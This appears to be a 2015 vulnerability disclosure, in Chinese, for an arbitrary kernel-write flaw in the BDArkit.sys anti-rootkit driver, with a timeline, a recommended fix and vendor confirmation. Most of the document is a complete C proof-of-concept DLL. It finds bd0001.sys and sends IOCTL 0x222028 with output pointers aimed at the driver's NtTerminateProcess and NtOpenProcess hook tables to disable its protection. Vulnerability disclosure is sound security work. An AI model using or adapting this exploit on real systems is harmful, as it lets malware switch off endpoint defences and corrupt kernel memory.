2015-04-02: 细节已通知厂商并且等待厂商处理中 2015-04-03: 厂商已经确认,细节仅向厂商公开 2015-04-06: 细节向第三方安全合作伙伴开放 2015-05-28: 细节向核心白帽子及相关领域专家公开 2015-06-07: 细节向普通白帽子公开 2015-06-17: 细节向实习白帽子公开 2015-07-02: 细节向公众公开
BDArkit.sys未检查DeviceIoControl传入地址的有效性,如果传入内核空间地址,可以造成任意地址写。
BDArkit.sys在IoControlCode=0x222028时,未检查传入地址的有效性,如果传入内核空间地址,可以造成任意地址写。如果传入bd0001.sys模块内保存的函数分发表地址,可造成驱动防御功能失效。
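// Proof-of-concept from the report: the BDArkit.sys handler for
// IoControlCode 0x222028 writes to the caller-supplied output address
// without checking that it lies in user space, so a kernel address passed
// as lpOutBuffer gets written to.  Defender's reading: an output pointer
// reaching the driver unvalidated has to be probed (ProbeForWrite) or
// marshalled by the I/O manager (METHOD_BUFFERED) before any write, which
// is the fix the report recommends.

// Locate the load address of a kernel module whose lower-cased image name
// contains pName, via ZwQuerySystemInformation with information class 11
// (SystemModuleInformation).  Returns 0 when ntdll lookup, the query, or
// the name match fails.  The DWORD return value and the DWORD pointer
// arithmetic in Fuzz2 make this PoC 32-bit only.
DWORD GetDriverBase(const CHAR* pName)
{
    typedef struct _SYSTEM_MODULE_INFORMATION {
        ULONG  Reserved[2];
        PVOID  Base;
        ULONG  Size;
        ULONG  Flags;
        USHORT Index;
        USHORT Unknown;
        USHORT LoadCount;
        USHORT ModuleNameOffset;
        CHAR   ImageName[256];
    } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
    typedef LONG (WINAPI* FN_ZwQuerySystemInformation)(ULONG, PVOID, ULONG, PULONG);

    // No name to match means no match is possible; the original looped to
    // completion and returned 0 in this case, so returning early is equivalent.
    if (!pName)
        return 0;

    FN_ZwQuerySystemInformation fn = (FN_ZwQuerySystemInformation)GetProcAddress(
        GetModuleHandle(_T("ntdll")), "ZwQuerySystemInformation");
    if (!fn)
        return 0;

    const ULONG bufSize = 0x10000;
    CHAR* pBuffer = new CHAR[bufSize];
    memset(pBuffer, 0, bufSize);

    DWORD dwBase = 0;
    ULONG cb = 0;
    // Fixed 64 KiB buffer: if the module list does not fit, the query
    // returns a non-zero status and the function silently reports 0.
    LONG status = (*fn)(11, pBuffer, bufSize, &cb);
    if (0 == status) {
        ULONG count = *((ULONG*)pBuffer);
        PSYSTEM_MODULE_INFORMATION pInfo =
            (PSYSTEM_MODULE_INFORMATION)(pBuffer + sizeof(ULONG));
        for (ULONG i = 0; i < count; ++i) {
            if ('\0' == pInfo[i].ImageName[0])
                continue;
            strlwr(pInfo[i].ImageName);   // case-insensitive substring match
            if (strstr(pInfo[i].ImageName, pName)) {
                dwBase = (DWORD)pInfo[i].Base;   // truncates on 64-bit; PoC is 32-bit
                break;
            }
        }
    }
    delete[] pBuffer;   // was `delete pBuffer`: array new needs array delete (UB otherwise)
    return dwBase;
}

// Issue the two IOCTL 0x222028 requests the report describes.  Each passes,
// as the output pointer, a kernel address inside bd0001.sys (the hook
// dispatch tables named in the report) with an output length of 0; the
// unpatched driver writes there without validation.  A driver that probes
// its output buffer would fail both calls instead.  Return values are not
// inspected: the PoC is fire-and-forget and the driver's write is the
// observable effect.
void Fuzz2(HANDLE hDev)
{
    DWORD bd0001Base = GetDriverBase("bd0001.sys");
    if (!bd0001Base)
        return;

    const DWORD code = 0x222028;
    char inputBuff[0x1000] = { 0 };
    const DWORD inputLen = 0xfc4;
    DWORD dwReturned = 0;

    // Leading DWORDs of the input buffer, as given in the report.
    const DWORD header[] = { 0x0000000a, 0xfc4 };
    memcpy(inputBuff, header, sizeof header);

    DeviceIoControl(hDev, code, (LPVOID)inputBuff, inputLen,
                    (LPVOID)(bd0001Base + 0x14e80), // hook dispatch table for NtTerminateProcess
                    0, &dwReturned, NULL);
    DeviceIoControl(hDev, code, (LPVOID)inputBuff, inputLen,
                    (LPVOID)(bd0001Base + 0x132a8), // hook dispatch table for NtOpenProcess
                    0, &dwReturned, NULL);
}

// Open the BDArKit device and run Fuzz2 against it.  Only GENERIC_READ is
// requested, which is itself worth noting from the defender's side: the
// write reached through the IOCTL does not depend on write access to the
// device object.
void Fuzz1()
{
    LPCTSTR DevName = _T("\\\\.\\BDArKit");
    HANDLE hDev = CreateFile(DevName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,
                             NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (INVALID_HANDLE_VALUE == hDev)
        return;
    Fuzz2(hDev);
    CloseHandle(hDev);
}

// DLL entry point: runs the PoC on every attach/detach reason.  Doing
// CreateFile/DeviceIoControl under the loader lock is against DllMain
// guidance; kept as in the report because it is the PoC's delivery vehicle.
BOOL DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    Fuzz1();
    return TRUE;
}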
增加对DeviceIoControl输入输出参数的检验。
危害等级:高
漏洞Rank:20
确认时间:2015-04-03 16:18
感谢提交
暂无